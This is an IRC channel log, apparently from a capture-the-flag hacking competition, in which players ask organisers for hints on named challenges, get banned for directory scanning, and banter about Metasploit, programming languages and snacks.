(00:15:46) nIck: ([SH]mom) is now known as (16WAAD7CE)
(00:15:49) nIck: (frozencemetery) is now known as (16WAAD67A)
(00:16:04) jOin: (jjk_) (~jjk@2a01:4240:53f0:33b0::1)
(00:16:04) jOin: (upb) (cmpxchg@unaffiliated/upb)
(00:16:04) jOin: (BrianWGray) (~BrianWGra@unaffiliated/brianwgray)
(00:16:04) jOin: (psifertex) (~psifertex@unaffiliated/psifertex)
(00:16:05) jOin: (auscompgeek) (aucg@firefox/community/auscompgeek)
(00:16:05) jOin: (Galactic) (~Galactic@unaffiliated/galactic)
(00:16:05) jOin: (Tokage-Kira) (uid15875@gateway/web/irccloud.com/x-adqrbntyqeceebtc)
(00:16:05) jOin: (ikari) (~ikari@2001:1938:2e4::8)
(00:16:05) jOin: (Yolanda) (uid29179@gateway/web/irccloud.com/x-hytlcbhzztqaifai)
(00:16:06) jOin: (jduck) (~jdrake@metasploit/jduck)
(00:16:06) jOin: (abuss) (~abuss@unaffiliated/abuss)
(00:16:06) jOin: (kurti) (~kurti@unaffiliated/kurti)
(00:16:06) jOin: (dim_maK) (mak@nat/dcunetworkingsociety/x-qcaddrzsnlktapac)
(00:16:06) mOde: (sendak.freenode.net) sets (+v frozencemetery)
(00:16:06) jOin: (guy_) (~guy@unaffiliated/guy/x-2189580)
(00:16:06) jOin: (qll) (~qll@unaffiliated/qll)
(00:16:06) jOin: (lynks) (~lynks@unaffiliated/lynks)
(00:16:06) jOin: (EiNSTeiN_) (~einstein@unaffiliated/einstein/x-615171)
(00:16:06) jOin: (aterribleloss) (~quassel@2607:fe50:0:6300::130)
(00:16:06) jOin: (mbr_) (~mbr@2605:f700:c0:1::2975:a675)
(00:16:07) jOin: (hkr`) (~hkr@unaffiliated/hkr/x-6459160)
(00:16:07) jOin: (hadahash) (uid25580@gateway/web/irccloud.com/x-wsnoahgwqigwbhij)
(00:16:07) jOin: (sibios) (~sibios@unaffiliated/sibios)
(00:16:07) jOin: (a13k) (~a13k@unaffiliated/a13k)
(00:16:07) jOin: (blackops) (chanlon@nat/google/x-fqbggxsqaldmygxi)
(00:16:07) jOin: (vladum) (vladum@nat/google/x-nystqscjkxmoowus)
(00:16:07) jOin: (jiva) (~j@disekt/jiva)
(00:16:07) jOin: (suspenders) (ident@2600:3c02::f03c:91ff:fe93:5570)
(00:16:07) jOin: (HockeyInJune) (sid17970@gateway/web/irccloud.com/x-ctjiaaopkbcjhczm)
(00:16:08) jOin: (connection) (~connectio@hacktalk/staff/connection)
(00:16:08) jOin: (pnX) (~pnx@unaffiliated/pnx)
(00:16:09) jOin: (dunamis) (~dunamis@unaffiliated/dunamis)
(00:16:09) jOin: (PHLAK) (~chris@unaffiliated/phlak)
(00:16:09) jOin: (spectralsun) (~spectrals@unaffiliated/spectralsun)
(00:16:09) mOde: (sendak.freenode.net) sets (+v clockish)
(00:16:09) jOin: (HENLEYbls) (sid16516@gateway/web/irccloud.com/x-rugekvlsuoumfzfg)
(00:16:10) jOin: (Nothingness) (~internet@unaffiliated/nothingness)
(00:16:10) jOin: (erye) (~erye@unaffiliated/erye)
(00:16:10) jOin: (brogle) (~austin@unaffiliated/brogle)
(00:16:10) jOin: (LuckyY) (~LuckY@unaffiliated/luckyy)
(00:16:10) jOin: (dbuq) (~quassel@unaffiliated/dbuq)
(00:16:11) nIck: (tylerni7) is now known as (16WAAD65R)
(00:16:11) jOin: (awesie) (~awesie@freenode/sponsor/awesie)
(00:16:12) jOin: (DrunkenPanda) (~mpex@unaffiliated/drunkenpanda)
(00:16:12) jOin: (cd1zz) (~pwnag3@unaffiliated/cd1zz)
(00:16:12) jOin: (haakjes) (~user@unaffiliated/haakjes)
(00:16:13) jOin: (tylerni7) (~tylerni7@unaffiliated/tylerni7)
(00:16:13) mOde: (sendak.freenode.net) sets (+vv awesie tylerni7)
(00:16:14) nIck: (tomcr00se_) is now known as (tomcr00se)
(00:16:17) (awesie_) \o/
(00:16:21) (tomcr00se) wow disaster
(00:16:25) (c1b3rh4ck) I've got a valid flag , but the system seems not validating it
(00:16:38) (+frozencemetery) c1b3rh4ck: what chal?
(00:16:41) (ricky) Woo, everyone's back
(00:16:41) (16WAAD7AR) oh got the netjoins
(00:16:46) (16WAAD7AR) aaahahahah
(00:16:47) (ricky) tomcr00se: Hey, you should do the web challenge. It is a quality challenge
(00:17:23) jOin: (mrsmith67) (uid11196@gateway/web/irccloud.com/session)
(00:17:23) jOin: (zTrix) (~zTrix@2402:f000:5:7a01:343f:c90d:c71f:8530)
(00:17:23) jOin: (DKay) (uid11914@gateway/web/irccloud.com/x-hwffhwtrovwugdvc)
(00:17:24) (16WAAD7AR) but where is ChanServ
(00:17:27) (+mserrano) Oh god
(00:17:28) jOin: (kiwhacks) (~kiwhacks@2a01:e35:87ea:8920:6a5d:43ff:fe86:f128)
(00:17:28) jOin: (kurtisebear) (sid28273@gateway/web/irccloud.com/x-ettntmmjyjvsqznk)
(00:17:28) jOin: (mathiasbynens) (sid2247@gateway/web/irccloud.com/x-bahgxrmimlqnassq)
(00:17:28) jOin: (javex) (javex@2a01:7e00::f03c:91ff:fe70:76f8)
(00:17:31) (tomcr00se) ricky: that yours?
(00:17:31) (16WAAD7AR) aaaahahaa
(00:17:36) (ricky) tomcr00se: It's the best web challenge ever
(00:17:36) jOin: (zoomequipd) (~zoomequip@gateway/tor-sasl/zoomequipd)
(00:17:36) jOin: (devotchka) (~Hi@unaffiliated/n00dl3)
(00:17:36) jOin: (marcoscars02) (~ms02@unaffiliated/marcoscars02)
(00:17:36) jOin: (maikol) (~deth@disekt/maikol)
(00:17:36) jOin: (bs`) (~bs@gateway/tor-sasl/bs/x-48276796)
(00:17:39) nIck: (dickoff) is now known as (16WAAD66A)
(00:17:39) nIck: (chunderstruck) is now known as (16WAAD6K4)
(00:17:40) (ricky) tomcr00se: (Yeah, it's mine)
(00:17:42) jOin: (larsan) (~larsan@2001:1a50:11:0:5f:8f:acac:1)
(00:17:42) jOin: (neodyblue) (~neodyblue@2001:41d0:8:796e::1)
(00:17:42) jOin: (audioPhil) (~quassel@unaffiliated/audiophil1)
(00:17:42) jOin: (warrick) (~warrick@disekt/warrick)
(00:17:43) jOin: (dickoff) (~dickoff@unaffiliated/dickoff)
(00:17:43) jOin: (thomakj) (~thomakj@2001:700:300:1430:c5cd:9a66:6e38:98d6)
(00:17:43) jOin: (comawill) (~quassel@2001:6f8:900:90f4:3d42:cdb9:9fef:36cd)
(00:17:43) mOde: (sendak.freenode.net) sets (+v dickoff)
(00:17:43) (tomcr00se) haha, i'm scared
(00:17:49) (Brooklynt_Overfl) can I PM a mod about kappa
(00:17:49) nIck: (f00b4r) is now known as (7F1AAAJON)
(00:17:50) (+mserrano) FREENOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOODDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
(00:17:52) (16WAAD7AR) tomcr00se: solve the web challenge, we really want at least one solve
(00:17:53) jOin: (moeyebus) (~moeyebus@unaffiliated/moebius-eye/x-4065625)
(00:17:53) jOin: (oldtopman) (~oldtopman@unaffiliated/oldtopman)
(00:17:53) jOin: (dwn) (~cute@unaffiliated/daman)
(00:17:53) jOin: (Atlantic777) (~Atlantic7@unaffiliated/atlantic777)
(00:17:53) jOin: (soleblaze) (~soleblaze@unaffiliated/soleblaze)
(00:17:54) jOin: (chuckleberry) (nemo@nat/dcunetworkingsociety/x-xnvlmuckkglgpyek)
(00:17:54) jOin: (irdan) (reicherd@osuosl/staff/irdan)
(00:17:54) jOin: (danitorwS) (~danitorwS@unaffiliated/danitorws)
(00:17:56) (tomcr00se) i have a few easy points first
(00:17:59) (c1b3rh4ck) heartbleed
(00:17:59) (arthurdent) yay denesplot
(00:18:11) (16WAAD66A) Brooklynt_Overfl: me
(00:18:12) (+mserrano) c1b3rh4ck: your key is probably not correct
(00:18:15) (ricky) tomcr00se: The first part of the web challenge is easy enough, the last part is probably more of a pain
(00:18:17) (+mserrano) PM me what you think it is
(00:18:21) (16WAAD66A) Brooklynt_Overfl: oh wait
(00:18:28) (Brooklynt_Overfl) 16WAAD66A: you don't have ops bro
(00:18:36) (+mserrano) that's dickoff
(00:18:37) (+dickoff) Brooklynt_Overfl: me lol
(00:18:39) (ricky) Hahaha
(00:18:41) (+mserrano) he just got wrecked by services
(00:18:42) (+mserrano) lol
(00:18:57) (+frozencemetery) #rekt
(00:18:59) (nopple) ricky: if your web challenge was intended to go where i'm going, i definitely approve :)
(00:19:11) (+mserrano) nopple: "web"
(00:19:25) (ricky) nopple: :-P
(00:21:27) qUit: (stypr_irccloud) (sid16290@gateway/web/irccloud.com/session) Changing host
(00:21:27) jOin: (stypr_irccloud) (sid16290@gateway/web/irccloud.com/x-qlhoqhwnnieuwlxm)
(00:21:36) (+frozencemetery) brutal
(00:21:43) (+awesie) how are people doing on harry_potter?
(00:21:55) (ricky) nopple: Would be interested to hear where you are and where you think it's going in PM if you're not too busy looking :-)
(00:22:00) qUit: (mrsmith67) (uid11196@gateway/web/irccloud.com/session) Changing host
(00:22:01) jOin: (mrsmith67) (uid11196@gateway/web/irccloud.com/x-wrpmyrgkuuglgdje)
(00:22:50) nIck: (16WAAD7CE) is now known as ([SH]mom_)
(00:25:27) (AnthraX101) is wheeeee working? it appears to just disconnect after solving the proof of work and giving it an encryption string
(00:25:54) (+mserrano) AnthraX101: hm
(00:28:17) (ricky) OK. So...
(00:28:26) (+mserrano) AnthraX101: (am checking)
(00:28:30) (+mserrano) (proof of work takes a bit)
(00:28:37) (AnthraX101) Thanks
(00:29:43) (+mserrano) AnthraX101: responded to me
(00:29:47) (+mserrano) and sent me back stuff
(00:29:51) (AnthraX101) Ok, thanks.
(00:29:58) (+mserrano) you have to send it stuff encoded in hex I think
(00:30:06) (AnthraX101) Ohhh, thanks!
(00:30:18) (ricky) ANNOUNCEMENT: bronies is not intended to be solved via client side exploits - if you manage to do so though, that's fair game
(00:30:19) (+mserrano) I should put that in the description
(00:30:40) jOin: (justinsteven) (~justinste@unaffiliated/justinsteven)
(00:30:40) jOin: (epochtato) (~epochfail@ec2-54-252-29-104.ap-southeast-2.compute.amazonaws.com)
(00:30:40) jOin: (pouete) (~pouete@unaffiliated/pouete)
(00:30:41) jOin: (DooMMasteR) (~DooMMaste@unaffiliated/doommaster)
(00:30:41) jOin: (Dad`) (~Dad@unaffiliated/dad/x-6432127)
(00:30:41) jOin: (Zerith) (~kvirc@unaffiliated/zerith)
(00:32:23) (ricky) I do consider the non-webkit method to be significantly easier though :_)
(00:33:30) qUit: (DrunkenPanda) (~mpex@unaffiliated/drunkenpanda) Ping timeout: 252 seconds
(00:34:26) (tomcr00se) omg how'd you all do whatscat
(00:34:44) qUit: (hadahash) (uid25580@gateway/web/irccloud.com/x-wsnoahgwqigwbhij) Quit: Connection closed for inactivity
(00:34:50) (AnthraX101) mserrano: Thanks, that worked for me!
(00:34:56) (+mserrano) tomcr00se: gotta pull together your webhacking skills
(00:35:04) (tomcr00se) like...i have the exploits
(00:35:05) (ricky) tomcr00se: Hey you should practice on bronies
(00:35:17) (ricky) Then you'll have the skills to solve whatscat!
(00:36:10) (jduck) this game is too easy when you have ubuntu remote ring0 0day!
(00:36:28) (ricky) Hehe
(00:36:37) (+mserrano) yeah man
(00:36:44) (+mserrano) it's like defcon when you have an autopwn program
(00:36:54) (+mserrano) which we totally have amirite guys
(00:37:01) (psifertex) ahaha, just noticed the "largestctf.com" reference. lulz.
(00:37:06) (+mserrano) psifertex: :D
(00:37:12) (ricky) :-P
(00:37:31) (+awesie) Due to the lack of pwning against harry_potter, point value has been doubled!
(00:37:40) (+awesie) Hack more plz~!
(00:37:41) (psifertex) mserrano: absolutely, I read it in the news, so it must be true. or maybe a guy I heard from told me he read it in the news. one of the two.
(00:37:48) (bool_101) oh nice
(00:37:49) (jduck) ok not really, but i thought it was an interesting thought exercise =)
(00:38:16) nIck: (bool_101) is now known as (bool101)
(00:38:30) jduck just watched anchorman
(00:38:31) (jduck) 2
(00:39:02) (+dickoff) jduck: I heard it was terrible
(00:40:32) (jduck) imdb has 6.2/10, i think that's pretty accurate
(00:40:36) (+mserrano) so
(00:40:39) (+mserrano) pretty mediocre
(00:40:43) (jduck) there were definitely a couple of crackups in there =)
(00:40:49) (jduck) arguably those make it all worth it
(00:45:30) (tomcr00se) awesie: 400 points and i'll do it :P
(00:45:42) (+mserrano) 300 is a lotta points
(00:45:50) (tomcr00se) ricky: i'm stuck on bronies
(00:45:56) (ricky) tomcr00se: Yeah! It's the best web problem ever!
(00:46:09) (18VAAD0FH) I cant stop watching spiderman and the ponies
(00:46:27) (18VAAD0FH) oh and reading what people are posting somewhere...
(00:46:32) (ricky) Haha
(00:46:39) (tomcr00se) i really think you are looking for a webkit exploit
(00:47:12) (+mserrano) would we really do that?
(00:47:13) (ricky) tomcr00se: I'm not
(00:47:33) (ricky) There's a much easier way to solve this - I didn't realize that the latest stable phantomjs was vulnerable :-(
(00:48:17) jOin: (lavish) (~lavish@gentoo/user/lavish)
(00:49:27) (ricky) Whelp, let me know if anybody finds any interesting or less obvious bugs in bronies - hoping somebody makes it to the next step soon :-)
(00:49:47) (phiber__) my next step is going to sleep
(00:50:01) jOin: (asdfasdgag) (6cab7303@gateway/web/freenode/session)
(00:50:02) jOin: ([SF]testdata) (75c1a957@gateway/web/freenode/session)
(00:50:02) jOin: (almac) (458cf96e@gateway/web/freenode/ip.69.140.249.110)
(00:50:02) jOin: (bobsteam) (1817f0b6@gateway/web/freenode/session)
(00:50:02) jOin: (thedoctordmc) (4ba3c7ba@gateway/web/freenode/session)
(00:50:02) jOin: (cxc123) (ca780766@gateway/web/freenode/session)
(00:50:02) jOin: (43UAABJS1) (d1cb4e22@gateway/web/freenode/session)
(00:50:03) jOin: (eastwolf_) (ad42d345@gateway/web/freenode/ip.173.66.211.69)
(00:50:03) jOin: (deder) (d4293493@gateway/web/freenode/ip.212.41.52.147)
(00:50:03) jOin: (haoz) (b44ac723@gateway/web/freenode/ip.180.74.199.35)
(00:50:03) jOin: (l0l0l) (932e7f69@gateway/web/freenode/ip.147.46.127.105)
(00:50:03) jOin: (hoxy) (5d53a8a2@gateway/web/freenode/ip.93.83.168.162)
(00:50:03) jOin: (nUl1) (5d9dadb6@gateway/web/freenode/ip.93.157.173.182)
(00:50:04) qUit: (cxc123) (ca780766@gateway/web/freenode/session) Quit: Page closed
(00:50:08) qUit: (43UAABJS1) (d1cb4e22@gateway/web/freenode/session) Changing host
(00:50:08) jOin: (43UAABJS1) (d1cb4e22@gateway/web/freenode/ip.209.203.78.34)
(00:50:09) qUit: (thedoctordmc) (4ba3c7ba@gateway/web/freenode/session) Changing host
(00:50:09) jOin: (thedoctordmc) (4ba3c7ba@gateway/web/freenode/ip.75.163.199.186)
(00:50:10) qUit: (bobsteam) (1817f0b6@gateway/web/freenode/session) Changing host
(00:50:10) jOin: (bobsteam) (1817f0b6@gateway/web/freenode/ip.24.23.240.182)
(00:50:10) qUit: ([SF]testdata) (75c1a957@gateway/web/freenode/session) Changing host
(00:50:10) jOin: ([SF]testdata) (75c1a957@gateway/web/freenode/ip.117.193.169.87)
(00:50:11) qUit: (asdfasdgag) (6cab7303@gateway/web/freenode/session) Changing host
(00:50:11) jOin: (asdfasdgag) (6cab7303@gateway/web/freenode/ip.108.171.115.3)
(00:51:35) (auscompgeek) what the actual netsplit.
(00:52:19) (18VAAD0FH) what tool is used to do whatcat, burp, nikto, python, perl, sqlmap, sqli, csrf...
(00:52:38) (ricky) python requests is awesome for web challenges
(00:52:49) (+mserrano) auscompgeek: lol
(00:53:07) (18VAAD0FH) curl up with a nice python....if you follow that, get a life haha
(00:53:37) jOin: (cylindrical) (76f3c596@gateway/web/freenode/ip.118.243.197.150)
(00:54:28) (cylindrical) any hints on kpop? write to which file?
(00:54:44) (+mserrano) cylindrical: you have basically no write permissions
(00:55:00) (tomcr00se) can i use dirbuster?
(00:55:03) (tomcr00se) on bronies?
(00:55:09) (+mserrano) tomcr00se: no
(00:55:18) (tomcr00se) on http://portal.essolutions.largestctf.com/?
(00:55:20) (ricky) Hahaha
(00:55:21) (+mserrano) no
(00:55:27) (nopple) lol that hint would have saved me a bunch of time on kpop earlier
(00:55:39) (cylindrical) mserrano: so i have to use another approach such as sqli?
(00:55:42) (+mserrano) nopple: ... yeah... I didn't realize people were gonna go for that
(00:55:50) (+mserrano) cylindrical: v0v
(00:56:11) (nopple) mserrano: yeah the source kind of hinted towards it, that's the only reason i fixated on it
(00:57:14) (tomcr00se) is there a page on http://portal.essolutions.largestctf.com/ i can't find?
(00:57:16) (+mserrano) "I was bored, maybe it's time to put something in my mouth again"
(00:57:28) (+mserrano) -- anonymous person in this channel
(00:57:45) (ricky) tomcr00se: There are no relevant pages on http://portal.essolutions.largestctf.com/ that we don't don't give you
(00:57:53) (ricky) Er, ignore the double negative
(00:57:53) (ricky) Haha
(00:57:55) (+mserrano) DON'T DON'T
(00:58:09) (tomcr00se) DIRBUSTER
(00:58:13) (ricky) BAN
(00:58:13) (robbje) Don't not use dirbuster
(00:58:29) (tomcr00se) hmm, i see what you did there
(00:59:30) (+mserrano) tomcr00se: do you have a vps in russia or someshit
(00:59:32) (ricky) tomcr00se: Oh did you find anything interesting? Interested in hearing :-)
(00:59:41) (ricky) Unless you were talking about me banning the dirbuster, hehe
(01:00:01) (robbje) "vps" *cough*
(01:00:06) (+mserrano) lol
(01:00:27) (tomcr00se) i love the dirbuster
(01:01:30) (areke_) hey guys
(01:01:37) (areke_) what's the difficulty level compared to picoctf?
(01:01:43) (+mserrano) um
(01:01:44) (+mserrano) hard
(01:02:01) (+mserrano) quite a bit harder than pico
(01:02:03) (Yen1) on 'graphs', is the included ciphertext definitely correct?
(01:02:04) (+mserrano) Yen1: yes
(01:02:05) qUit: ([SF]testdata) (75c1a957@gateway/web/freenode/ip.117.193.169.87) Ping timeout: 240 seconds
(01:02:20) (areke_) mserrano: haha ok thanks
(01:02:27) (Yen1) I'm getting that it's not a valid zlib stream
(01:02:29) (areke_) and picoctf is gonna go on again this year right? :D
(01:02:32) (Yen1) which is a bit odd
(01:02:42) (+mserrano) areke_: in october
(01:04:18) (areke_) mserrano: thank you! i'll be sure to compete (hopefully not solo the next time)
(01:05:07) (jmgrosen) areke_: picoctf sure is a good starting point, though! :)
(01:05:39) (18VAAD0FH) SOLO sucks
(01:05:52) (jmgrosen) eh, that's true
(01:06:15) (jmgrosen) the rest of my team is going to be gone next year to colleges :(
(01:06:29) (+mserrano) jmgrosen: any of them CMU-bound?
(01:06:46) (jmgrosen) mserrano: unfortunately not; the only one that was considering it didn't get in :/
(01:06:51) (+mserrano) =\
(01:08:34) qUit: (NotoriousHUB) (
[email protected]) Read error: Connection reset by peer
(01:09:44) (|x_x|) CMU? That's way too far north of the Mason Dixon.
(01:09:54) ricky continues hoping for bronies solves :-)
(01:09:57) (+mserrano) |x_x|: wut.
(01:11:25) (ricky) worthless hint: automated tools will probably not help for pctf problems
(01:11:29) (cylindrical) and does mtpox require bruteforce?
(01:11:34) (ricky) At least not bronies :-)
(01:11:52) (dwlewis) cylindrical, nope
(01:11:53) (tomcr00se) ricky: don't worry, i'll solve it :)
(01:11:53) (+frozencemetery) |x_x|: how could you be less north of the mason dixon line without being north?
(01:11:53) (ricky) tomcr00se: :-D
(01:12:04) tomcr00se is getting dat webkit exploit ready
(01:12:16) (ricky) tomcr00se: :-( seriously?
(01:12:19) (ricky) Solve it the right way!
(01:12:49) (tomcr00se) ricky: are you checking your logs? i'm totally kidding
(01:13:16) (ricky) I am checking logs, and didn't see your IP in the list of people who made it past the first step
(01:14:43) (+clockish) tomcr00se: if you still want to throw an 0day I bravely volunteer to visit any link you send in the modern browser + os of your choice :P
(01:15:15) (+clockish) and phantomjs is not a modern browser :P
(01:15:23) (+frozencemetery) ur not a modern browser
(01:15:24) (cylindrical) dwlewis: isn't it impossible to solve mtpox without bruteforce?
(01:16:59) (dwlewis) cylindrical, there is an attack that uses only information that is given and doesn't require brute force
(01:17:44) (bobsteam) hmm... brony is fun
(01:17:52) (bobsteam) I like so far
(01:18:15) jOin: (fixception) (322e9f29@gateway/web/freenode/ip.50.46.159.41)
(01:18:23) (ricky) bobsteam: :-D
(01:19:22) (bobsteam) I think one of the things I love/hate so much about ctf is when things are really obvious or really not obvious lol (cause theres so much variation among players and whats fresh in our minds and all that jazz ;)
(01:19:35) qUit: (cylindrical) (76f3c596@gateway/web/freenode/ip.118.243.197.150) Ping timeout: 240 seconds
(01:19:45) (ricky) Hoping you found some interesting nonobvious things :-)
(01:19:55) (ricky) So what's everyone's favorite pony captcha?
(01:20:04) (ricky) Mine is Pricess Celestia
(01:20:33) (|x_x|) The one from that certain website where I can perfectly match the photo to the character name.
(01:20:58) (ricky) Spoilers: http://mlp.wikia.com/wiki/List_of_ponies - memorize them all!
(01:21:04) (|x_x|) >_>
(01:21:14) (|x_x|) Bad spoiler! People need to do their recon.
(01:21:23) (ricky) Oops, sorry :-P
(01:21:45) (snoopybbt) i've been working on reekee, it was nice
(01:23:45) ricky blocks another dirbuster - seriously, Russia
(01:24:04) (|x_x|) I've been jumping all over the place like a toddler doing lines of sugar off a seesaw on a summer's day.
(01:24:10) (|x_x|) And by that I mean, darn it's hard to focus sometimes.
(01:25:47) (haoz) need to obtain $SECRET to solve mtpox ?
(01:25:59) (|x_x|) That's my line of thought.
(01:26:19) (haoz) :(
(01:26:29) (inter) selling ricky's naked pics for 2BTC
(01:26:34) (inter) pm me
(01:27:00) (+mserrano) inter: I hear tylerni7 wants them
(01:27:06) (dct1_) I only have plaidcoins
(01:27:08) (|x_x|) inter: 2BTC? How about a cracker instead?
(01:27:18) (inter) i also take keys
(01:27:24) (inter) dota2 keys
(01:27:32) (inter) :trollface:
(01:28:16) (snoopybbt) selling reekee for 2 btc
(01:28:21) (snoopybbt) TROLOLOLOLOLOLOLOLO
(01:28:29) (snoopybbt) :P
(01:28:52) (snoopybbt) (just kidding)
(01:28:52) (|x_x|) Selling sanity check for a cookie.
(01:29:28) (shadghost) fucking browsers preventing me from scripting into a iframe
(01:29:29) (+frozencemetery) (sell your soul for a cookie?)
(01:29:54) (|x_x|) frozencemetery: I'd not think twice about it if they were girl scout cookies.
(01:29:56) shadghost hats browsers and the fact that they are trying to do security
(01:30:18) (+frozencemetery) aww shit lemon girl scout cookies would punish about now
(01:30:59) (|x_x|) I had girl scout cookies for the first time this year. I unfortunately didn't buy enough to last me the whole year.
(01:31:10) (zoku) should we expect randomization for ezhp?
(01:31:15) (zoku) I'm guessing no because 'ez', but...
(01:31:22) (+frozencemetery) don't feel too bad; it's not possible to buy enough to last the whole year
(01:31:54) (+mserrano) zoku: ASLR is on.
(01:32:05) (zoku) FYI, Yolanda is PMing me to trade key/solutions
(01:32:20) (zoku) damnit, thanks mserrano
(01:32:27) (pipecork) hey mods i can't find a metasploit module for mtpox... is it even solvable?
(01:32:33) (zoku) er..what about heap mserrano?
(01:32:45) (zoku) I mean..nevermind
(01:32:50) zoku <- needs sleeep
(01:32:51) (oceanx) pipecork: metasploit? wut!? :P btw it is solvable indeed :)
(01:33:03) (zoku) haha, trying to ctf with metasploit
(01:33:25) (|x_x|) Girl scout cookies are amazing. You start off biting into that first cookie suddenly overcome with excitement as waves of endorphins wash over your body. And then moments later you realize you just ate the last one and suddenly feel filthy and worthless for eating a whole tray of girl scout cookies.
(01:33:26) oceanx needs sleep too
(01:33:37) (pipecork) oceanx: you call yrself a security professional and you've never heard of metasploit??
(01:34:00) (oceanx) pipecork: you don't need metasploit for mtpox :)
(01:34:01) (+mserrano) I once installed metasploit during a CTF.
(01:34:09) (+mserrano) I very quickly regretted my decision.
(01:34:14) (+mserrano) Metasploit: not even once.
(01:34:19) (+clockish) python is always the answer
(01:34:21) (+clockish) never ruby
(01:34:25) +frozencemetery starts a flamewar about the evils of ruby
(01:34:28) (+clockish) no metasploit #2014
(01:34:28) (pipecork) clockish: is that a hint???
(01:34:30) (+frozencemetery) oh hey, got beaten to that :)
(01:34:32) (inter) python is always better than ruby
(01:34:38) (inter) but CLOCKISH WHY YOU NO LET ME PIPE
(01:34:39) (+clockish) pipecork: no, I'm ragging on metaslpoit
(01:34:40) (dkohlbre) mserrano: I did that, then I tried to use it to generate shellcode and it failed miserably. So I wrote some shellscripts to do it instead :P
(01:34:42) (|x_x|) Don't you mean Perl?
(01:34:42) (oceanx) mserrano: lol true story, I do hate metasploit with a passion :D
(01:34:44) (inter) the jail2stronk
(01:34:44) |x_x| dodges.
(01:34:50) (pipecork) clockish: i know. i know.
(01:34:54) (ryan-c) perl is awsome
(01:35:01) (+frozencemetery) haha perl
(01:35:04) (inter) perl
(01:35:04) (inter) is
(01:35:05) (inter) slow
(01:35:07) (+mserrano) dkohlbre: I tried to install during CSAW. A bunch of people gathered to watch me try to use metasploit for the first time ever
(01:35:09) (oceanx) perl
(01:35:09) (pipecork) did i just simultaneously start a metasploit flame AND a languages war?
(01:35:09) (oceanx) is
(01:35:11) (oceanx) evil
(01:35:13) (+clockish) pipecork: well, I guess ragging on metasploit is a hint in a way
(01:35:14) (+mserrano) spoiler: I did not successfully use metasploit
(01:35:41) (ryan-c) perl is awesome for one off hacks
(01:35:42) (dkohlbre) mserrano: rofl, I did it like 2-3 ctfs ago with people waiting for some x64 shellcode from me :P
(01:37:00) (nonomyfhmv) itz fun
(01:37:05) (oceanx) inter: and you can't even write gdb/ida/windbg/whatever plugins in ruby, python ftw! :P
(01:37:25) (|x_x|) Ruby is evil.
(01:37:45) (dkohlbre) but can you put python on rails. i hear rails are very good for languages
(01:37:57) (dkohlbre) makes them all web scale
(01:38:17) (+clockish) as the wise crowell once informed me, ruby is crazy japanese python from space
(01:38:36) (oceanx) |x_x|: I do not agree, perl is evil ...ruby sucks! :P
(01:38:51) (|x_x|) Does Python use mongodb? Becuse mongodb is web scale.
(01:38:54) (oceanx) clockish: lol :D
(01:39:03) (ryan-c) ffffffffffffffffffuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu
(01:39:05) (oceanx) |x_x|: motor and pymongo :)
(01:39:13) (+frozencemetery) if /dev/null is web scale then I will use it
(01:39:19) (|x_x|) <3
(01:40:20) (+clockish) http://devnull-as-a-service.com
(01:41:04) (orto) hi are there ops around, i want to see if i am right track for challenge
(01:41:18) (zoku) (gdb) c
(01:41:19) (zoku) Continuing.
(01:41:19) (zoku) process 14256 is executing new program: /bin/dash
(01:41:20) (zoku) :D
(01:41:33) (|x_x|) Rainbow Rash?
(01:41:34) (+clockish) zoku: poppin shellz, yo
(01:41:56) (+clockish) orto: which challenge?
(01:42:16) (orto) web 150
(01:42:28) (+clockish) which one is that?
(01:42:43) (orto) mtpox
(01:43:04) (pipecork) don't bother using metasploit
(01:44:12) (mike_pizza) what?? are you telling me i wiped my ubuntu install and got kali linux for NOTHING?
(01:44:47) (sibios) no, not nothing. Just a SHNAZZY new background! :D
(01:45:04) (|x_x|) Which makes it all worth using Kali linux.
(01:45:07) (pipecork) i tried installing kali once but my antivirus said it was malware. don't trust it!!!
(01:45:15) (+frozencemetery) the fuck would you use kali :|
(01:45:29) (arthurdent) frozencemetery: well it's hard to install metasploit on ohter OSes
(01:45:37) (+frozencemetery) ... okay?
(01:45:38) (pipecork) frozencemetery: all in the spirit of the game
(01:45:39) (+frozencemetery) like
(01:45:48) (orto) clockish: i'm guessing nobody is around right now for that challenge?
(01:45:51) (+frozencemetery) but don't you people know about virt?
(01:46:03) (arthurdent) is that a hacker?
(01:46:03) qUit: (nonomyfhmv) (
[email protected]) Remote host closed the connection
(01:46:04) (mike_pizza) enlighten me
(01:46:11) (orto) with all this broken on freenode i'm not surprised
(01:46:14) (pipecork) i think i met virt once
(01:46:21) (+clockish) orto: sorry, got distracted. PM either me or mserrano about that.
(01:46:21) (|x_x|) Is virt web scale?
(01:46:24) (arthurdent) im pretty sure i follow him on twitter
(01:46:27) (oceanx) lol
(01:46:49) (pipecork) Virt As A Service
(01:46:53) (sibios) ricky, were people running dirbuster against bronies (target site) getting the ban hammer?
(01:47:13) qUit: (zTrix) (~zTrix@2402:f000:5:7a01:343f:c90d:c71f:8530) Ping timeout: 252 seconds
(01:47:18) (ricky) sibios: Yeah, give me your IP if you need to be unbanned
(01:47:25) (sibios) oh, not banned
(01:47:28) (ricky) Oh, OK
(01:47:33) (sibios) just checking so I can keep from being banned
(01:47:36) (ricky) :-)
(01:47:40) (arthurdent) is dirbuster like metasploit? or virt?
(01:47:43) (ricky) dirbuster isn't useful anyway
(01:47:50) (|x_x|) dirbuster is web scale.
(01:47:57) (ricky) It just spams logs and sometimes makes things worse for other players
(01:48:22) (sibios) assumed as much, just thinking about how I can move forward when beef isn't keeping persistance on the bot :(
(01:48:30) (pipecork) TIL: drbuster isn't actually a cola
(01:48:41) (pipecork) it's 23 flavors make it very unique
(01:48:46) (arthurdent) its not one of those offbrand ones?
(01:49:30) (sibios) and zero knowledge of the target w/o session
(01:49:48) qUit: (DKay) (uid11914@gateway/web/irccloud.com/x-hwffhwtrovwugdvc) Quit: Connection closed for inactivity
(01:50:35) qUit: (haoz) (b44ac723@gateway/web/freenode/ip.180.74.199.35) Ping timeout: 240 seconds
(01:51:12) (tjbecker_) who can I ask about kpop?
(01:51:43) (auscompgeek) when does the CTF end?
(01:51:44) jOin: (abc_) (b44ac723@gateway/web/freenode/ip.180.74.199.35)
(01:51:45) (mrsmith67) can i ask someone about kappa?
(01:51:49) (mrsmith67) i have execution...
(01:51:57) (+mserrano) tjbecker_: ping me
(01:52:48) (Xteven) where can we report unintended bugs?
(01:52:53) (Xteven) or to whom?
